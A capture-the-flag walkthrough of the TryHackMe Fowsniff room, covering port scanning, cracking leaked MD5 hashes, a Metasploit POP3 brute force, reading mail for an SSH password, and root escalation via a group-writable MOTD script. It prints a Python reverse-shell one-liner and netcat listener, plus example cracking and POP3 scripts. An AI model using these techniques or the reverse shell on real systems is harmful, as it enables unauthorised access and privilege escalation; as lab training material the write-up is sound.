Fowsniff CTF | TryHackMe
Enumeration
So let's try to find out which ports and services are open, using nmap. The command I generally use for a quick starting scan is nmap -sV -vv <machine_ip>. It is not exhaustive, but it is enough to get started; if it doesn't turn up enough, or I want more detail, I can come back and run another scan with additional flags.
So let's run that scan here: nmap -sV -vv 10.10.157.167, and we see the following results:
Nmap scan results
As we can see, ports 80, 110, and 143 are the open ports among the common ones. Port 80 is HTTP, 110 is POP3, and 143 is IMAP.
Let's take a look at the website at http://10.10.157.167.
Fowsniff Corp website
The page says that Fowsniff's internal system suffered a data breach and that employee usernames and passwords may have been exposed. The attackers were also able to hijack the official @fowsniffcorp Twitter account and may release sensitive information through it. Let's see if they already did :).
On checking the @fowsniffcorp Twitter account, we see the following:
Fowsniff Corp's Twitter account
It has indeed been pwned, as suspected. The attacker leaked the password hashes in the pinned tweet. Let's open the Pastebin link to see the dump.
Going to https://pastebin.com/NrAqVeeX we get the following password hashes, dumped along with the email addresses:
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
Fowsniff Corporation Passwords LEAKED!
FOWSNIFF CORP PASSWORD DUMP! Here are their email passwords dumped from their databases. They left their pop3 server WIDE OPEN, too! MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P
Since all of those are MD5 hashes (32 hex characters, no salt shown), we can try to crack them. Before doing that, note this last tweet by the hijacked FowSniffCorp account:
It indicates that the sysadmin is stone, with the following credentials:
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
Hash Cracking
Let's try to crack that hash using an online tool, CrackStation, at crackstation.net. (One caveat: pasting hashes into a public lookup service discloses them to a third party, which is fine for a CTF but not for hashes from a real engagement; there, run hashcat or john locally.)
Hmm, it seems CrackStation could not crack the sysadmin's hash. Let's upload the whole hash list and see which of the others crack:
CrackStation hash cracker
As we can see, CrackStation was able to crack every hash except one: the sysadmin's (stone).
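What CrackStation does here is an unsalted MD5 dictionary lookup. The script below is an added example (not part of the original writeup or the room) of the same attack done offline: it parses the "user@domain:hash" lines from the dump quoted above, hashes each wordlist candidate once, and looks the digest up against all nine targets at the same time. The wordlist is constructed for the example; the only real hit in it is scoobydoo2, which this writeup later confirms as seina's password via the POP3 brute force, so the other entries stay uncracked the way stone's does on CrackStation. The last function emits the "user password" lines in the format the Metasploit USERPASS_FILE option expects, with the @fowsniff part stripped, since that is what the POP3 module later needs.

```python
import hashlib

# Constructed input: the nine "user@domain:md5" lines from the Pastebin dump quoted above.
DUMP = """\
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
"""

# Constructed wordlist standing in for rockyou.txt and friends. Only "scoobydoo2"
# (seina's password, confirmed later by the POP3 brute force) is a real hit; the
# rest are filler so the "not cracked" path is exercised too.
WORDLIST = ["password", "123456", "scoobydoo", "scoobydoo2", "letmein", "fowsniff"]


def parse_dump(text):
    """Return {username: hash} with the @domain part dropped and the hash lowercased."""
    creds = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        addr, digest = line.rsplit(":", 1)
        user = addr.split("@", 1)[0]          # "seina@fowsniff" -> "seina"
        creds[user] = digest.strip().lower()
    return creds


def crack_md5(targets, wordlist):
    """Unsalted MD5 dictionary attack over a {user: hash} map.

    Because there is no salt, one MD5 per candidate word covers every target at
    once: invert the map to {hash: [users]} and do a dict lookup per candidate.
    Returns {user: password_or_None}."""
    by_hash = {}
    for user, digest in targets.items():
        by_hash.setdefault(digest, []).append(user)
    cracked = {}
    for word in wordlist:
        digest = hashlib.md5(word.encode()).hexdigest()
        for user in by_hash.get(digest, []):
            cracked[user] = word
    return {user: cracked.get(user) for user in targets}


def userpass_lines(cracked):
    """Metasploit USERPASS_FILE format: 'user password' per line, cracked entries only."""
    return [f"{user} {pw}" for user, pw in cracked.items() if pw is not None]


if __name__ == "__main__":
    result = crack_md5(parse_dump(DUMP), WORDLIST)
    for user, pw in result.items():
        print(f"{user:10} {pw if pw else '<not cracked>'}")
    print("\n".join(userpass_lines(result)))
```

With a real wordlist in place of WORDLIST the loop is the whole attack; hashcat mode 0 does the same thing on the GPU, and the inverted-map trick is why cracking nine unsalted hashes costs no more than cracking one.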
Now let's try to brute force the POP3 login using Metasploit, as one of the questions in the room asks.
On opening msfconsole and doing search pop3, the first result is auxiliary/scanner/pop3/pop3_login, a module that brute-forces POP3 logins.
Let's use that module. First select it with use auxiliary/scanner/pop3/pop3_login (tip: you can also select by the number shown in the search results, 0 here, with use 0).
Now that the module is selected, we can show the options we need to set using show options.
Metasploit POP3 shows options
As we can see, I have already set the options. The module marks BRUTEFORCE_SPEED, RHOSTS (the machine we are attacking), RPORT (the POP3 port, 110), STOP_ON_SUCCESS, THREADS and VERBOSE as required; all of them except RHOSTS have usable defaults. I set USERPASS_FILE to a file containing the usernames and cracked passwords in pairs, one pair per line, separated by a space. (Note: I had to remove the @fowsniff part from the usernames to get a SUCCESS.) Also, point USER_FILE and PASS_FILE at empty files; otherwise the module also tries its default wordlists, which was taking much longer in my case.
Once we have the options set, all we need to do is run the module using run. It will try each of our username and password combinations.
POP3 Username and Password brute force results
As we can see, Metasploit ran our username and password combinations against the POP3 server and came back with one success: seina:scoobydoo2 worked.
Question: What was seina’s password to the email service?
Answer: scoobydoo2.
Let's try to connect to the email service using seina's credentials.
To do this, I did a quick search on DuckDuckGo and found this reference for the POP3 commands: https://electrictoolbox.com/pop3-commands/
So we can do telnet 10.10.157.167 110 to connect to the mail server. POP3 is a plain-text protocol, so the whole session can be typed by hand.
After that, we issue USER seina followed by PASS scoobydoo2, and the server answers +OK, so we are logged in.
Now we can do LIST to see the message list, which shows the number and the byte size of each message.
We can do RETR 1 to retrieve the 1st message. On doing that, we see it is from stone@fowsniff and it seems to have been sent to all other employees.
From the message we get the temporary SSH password:
S1ck3nBluff+secureshell
Question: Looking through her emails, what was a temporary password set for her?
Answer: S1ck3nBluff+secureshell
Similarly, we can retrieve the 2nd email message with RETR 2, but apart from who sent it (baksteen), it contains nothing of much use.
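The telnet session above is the POP3 exchange typed by hand. As an added example (not part of the original writeup), the script below speaks the same USER / PASS / LIST / RETR / QUIT sequence from Python and shows both sides of the conversation: it includes a constructed stand-in for the target's POP3 daemon so it runs offline, with a constructed inbox whose first message carries the line the writeup quotes and whose second message starts a line with "." to exercise RFC 1939 byte-stuffing (a detail that is easy to get wrong when parsing RETR output by hand). Against the real box you would point fetch_mailbox at 10.10.157.167 port 110 instead of the loopback server. The mailbox contents and the server are assumptions for the demo, not the real messages.

```python
import socket
import threading

USER, PASSWORD = "seina", "scoobydoo2"

# Constructed inbox standing in for seina's mailbox (not the real messages). Message 1
# carries the line the writeup quotes; message 2 starts a line with "." so the
# RFC 1939 byte-stuffing path is exercised.
MAILBOX = [
    b"From: stone@fowsniff\r\nSubject: URGENT: temporary SSH password\r\n\r\n"
    b"Temporary password: S1ck3nBluff+secureshell\r\n",
    b"From: baksteen@fowsniff\r\nSubject: hi\r\n\r\n.hidden line starting with a dot\r\nnothing useful\r\n",
]


def stuff(body):
    """Byte-stuff a message for RETR: any line starting with '.' gets another '.' in front."""
    lines = body.rstrip(b"\r\n").split(b"\r\n")
    return b"".join((b"." + l if l.startswith(b".") else l) + b"\r\n" for l in lines)


def pop3_server(listener):
    """Constructed stand-in for the target's POP3 daemon: one client, USER/PASS/LIST/RETR/QUIT."""
    conn, _ = listener.accept()
    f = conn.makefile("rwb")
    f.write(b"+OK POP3 ready\r\n"); f.flush()
    user, authed = None, False
    while True:
        line = f.readline()
        if not line:
            break
        cmd, _, arg = line.rstrip(b"\r\n").partition(b" ")
        cmd = cmd.upper()
        if cmd == b"USER":
            user = arg.decode(); f.write(b"+OK\r\n")
        elif cmd == b"PASS":
            authed = user == USER and arg.decode() == PASSWORD
            f.write(b"+OK Logged in.\r\n" if authed else b"-ERR [AUTH] invalid login\r\n")
        elif not authed:
            f.write(b"-ERR not logged in\r\n")
        elif cmd == b"LIST":
            f.write(b"+OK %d messages\r\n" % len(MAILBOX))
            f.write(b"".join(b"%d %d\r\n" % (i, len(m)) for i, m in enumerate(MAILBOX, 1)) + b".\r\n")
        elif cmd == b"RETR" and arg.isdigit() and 1 <= int(arg) <= len(MAILBOX):
            msg = MAILBOX[int(arg) - 1]
            f.write(b"+OK %d octets\r\n" % len(msg) + stuff(msg) + b".\r\n")
        elif cmd == b"QUIT":
            f.write(b"+OK bye\r\n"); f.flush(); break
        else:
            f.write(b"-ERR bad command or argument\r\n")
        f.flush()
    conn.close()


def fetch_mailbox(host, port, user, password):
    """Client side of the telnet session: USER, PASS, LIST, RETR n for each message, QUIT.
    Returns {message_number: text}; raises RuntimeError on any -ERR (e.g. a bad password)."""
    sock = socket.create_connection((host, port))
    f = sock.makefile("rwb")
    f.readline()  # server greeting

    def send(command):
        f.write(command.encode() + b"\r\n"); f.flush()
        status = f.readline().rstrip(b"\r\n")
        if not status.startswith(b"+OK"):
            raise RuntimeError(f"{command.split()[0]} failed: {status.decode(errors='replace')}")

    def multiline():
        # Read until the lone "." terminator, undoing byte-stuffing ("..x" -> ".x").
        out = []
        while (l := f.readline()) not in (b".\r\n", b""):
            out.append(l[1:] if l.startswith(b"..") else l)
        return b"".join(out)

    try:
        send("USER " + user)
        send("PASS " + password)
        send("LIST")
        numbers = [int(l.split()[0]) for l in multiline().split(b"\r\n") if l]
        msgs = {}
        for n in numbers:
            send(f"RETR {n}")
            msgs[n] = multiline().decode()
        send("QUIT")
    finally:
        sock.close()
    return msgs


def run_demo(password=PASSWORD):
    """Start the constructed server on a loopback port and read seina's inbox through it."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0)); listener.listen(1)
    threading.Thread(target=pop3_server, args=(listener,), daemon=True).start()
    try:
        return fetch_mailbox("127.0.0.1", listener.getsockname()[1], USER, password)
    finally:
        listener.close()


if __name__ == "__main__":
    for n, text in run_demo().items():
        print(f"--- RETR {n} ---\n{text}")
```

Note that credentials travel in the clear on port 110, which is exactly why a leaked hash list plus an open POP3 port was enough here; a real client would use POP3S (port 995) or STLS.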
Now let's try to log in over SSH with stone's account and that password, as the next question hints:
ssh stone@10.10.157.167
It seems this password doesn't work for stone, nor for seina. Let's see if it works for baksteen, since the 2nd email was sent by them.
And it worked! We are logged in to the system as baksteen.
Privilege Escalation
Let's see which groups the user is part of, using the groups command. We can see that baksteen is a member of the users and baksteen groups. Let's see if there are any interesting files that members of those groups can write to or execute.
We find an interesting file, /opt/cube/cube.sh. On checking the permissions, we see it is group-owned by users and writable by that group, so we can edit it. This script is executed by the Message of the Day script /etc/update-motd.d/00-header, which runs as root every time someone logs in over SSH. So anything we put in cube.sh runs as root on the next login. Let's add a reverse shell to it, using the Python reverse shell provided by TryHackMe:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Replace <IP> with our attacking machine's IP (keeping the double quotes, since it is a string) and 1234 with whichever port we want the shell to connect back on. The outer quotes must be straight single quotes, because the line goes into a shell script.
Now set up a netcat listener on the attacking machine to receive the connection: nc -lvnp 4444. The listener port must match the port in the payload, so either change 1234 to 4444 in the one-liner or listen on 1234.
Once everything is ready, we connect to the machine over SSH again as baksteen.
Right after we log in, the MOTD script runs cube.sh as root and we get a reverse shell connection back as root on the netcat listener!
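The privilege escalation above comes down to one check: a script that root runs on login references a file that a low-privileged group can write. As an added example (not from the writeup or the room), the script below automates that check: it reads every script in an update-motd.d directory, pulls out the absolute paths each one mentions (sourced files, called scripts, binaries), and reports those that exist and that the current user can write, along with their mode string. It takes a root parameter so the same function can be pointed at a constructed directory tree for an offline run; build_demo_tree builds a hypothetical layout mirroring the box (a 00-header that calls /opt/cube/cube.sh, which is group-writable, and also sources an /etc/lsb-release that does not exist in the tree). The file contents are assumptions for the demo, not copies of the target's scripts.

```python
import os
import re
import stat
import tempfile

# Absolute paths mentioned anywhere in a script (sourced files, called scripts, binaries).
PATH_RE = re.compile(r"(?<![\w.-])/[\w./-]+")


def find_writable_hooks(motd_dir, root="/"):
    """For each script in motd_dir (run as root on login), list the absolute paths it
    mentions that exist and that the current user can write, with their mode string.
    `root` lets the check run against a constructed tree instead of the live system.
    Returns {script_name: [(path, mode), ...]} for scripts with at least one hit."""
    findings = {}
    for name in sorted(os.listdir(motd_dir)):
        script = os.path.join(motd_dir, name)
        if not os.path.isfile(script):
            continue
        with open(script, errors="replace") as fh:
            text = fh.read()
        hits = []
        for path in sorted(set(PATH_RE.findall(text))):
            real = os.path.join(root, path.lstrip("/"))
            if os.path.isfile(real) and os.access(real, os.W_OK):
                hits.append((path, stat.filemode(os.stat(real).st_mode)))
        if hits:
            findings[name] = hits
    return findings


def build_demo_tree():
    """Constructed directory tree mirroring the box (hypothetical contents, not copied
    from the target): update-motd.d/00-header calls /opt/cube/cube.sh, which is
    group-writable, and sources /etc/lsb-release, which does not exist in the tree."""
    root = tempfile.mkdtemp(prefix="motd-demo-")
    motd = os.path.join(root, "etc/update-motd.d")
    cube = os.path.join(root, "opt/cube")
    os.makedirs(motd); os.makedirs(cube)
    with open(os.path.join(motd, "00-header"), "w") as fh:
        fh.write("#!/bin/sh\n[ -r /etc/lsb-release ] && . /etc/lsb-release\nsh /opt/cube/cube.sh\n")
    with open(os.path.join(cube, "cube.sh"), "w") as fh:
        fh.write("printf 'banner\\n'\n")
    os.chmod(os.path.join(cube, "cube.sh"), 0o664)   # rw for owner and group, like the real file
    return root


def demo_findings():
    """Run the check against the constructed tree; on the box you would pass the real directory."""
    root = build_demo_tree()
    return find_writable_hooks(os.path.join(root, "etc/update-motd.d"), root=root)


if __name__ == "__main__":
    if os.path.isdir("/etc/update-motd.d"):        # on a real box: audit the live directory
        print(find_writable_hooks("/etc/update-motd.d"))
    print(demo_findings())                         # offline: the constructed tree
```

The same idea generalises beyond MOTD: any root-run hook (cron jobs, systemd units, pam_exec scripts) that calls a path writable by your group is the same bug, and the fix on the defending side is the one this box lacks: no group-writable files referenced from scripts that run as root.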
Root access
And that completes